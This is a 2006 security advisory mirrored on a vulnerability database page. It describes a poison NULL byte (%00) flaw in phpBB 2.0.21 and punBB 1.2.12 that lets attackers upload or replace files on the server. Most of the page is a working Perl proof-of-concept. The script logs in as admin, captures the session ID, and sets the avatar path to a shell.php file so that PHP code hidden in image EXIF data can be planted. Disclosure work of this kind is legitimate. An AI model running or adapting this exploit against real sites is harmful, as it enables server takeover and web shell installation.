Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14207
HistorySep 11, 2006 - 12:00 a.m.

multiple PHP application poison NULL byte vulnerability

2006-09-1100:00:00
vulners.com
24
JSON

Author: ShAnKaR
Title: multiple PHP application poison NULL byte vulnerability
Applications: phpBB 2.0.21, punBB 1.2.12
Threat Level: Critical

Poison NULL byte vulnerability for perl CGI applications was described
in [1]. ShAnKaR noted, that same vulnerability also affects different
PHP applications. An example of vulnerable applications are phpBB and
punBB.

Vulnerability can be used to upload or replace arbitrary files on
server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.

In case of phpBB and punBB vulnerability can be exploited by changing
location of avatar file and uploading avatar file with PHP code in EXIF
data.

A PoC exploit to change Avatar file location for phpBB:

#!/usr/bin/perl -w

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}

References:
[1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55

JSON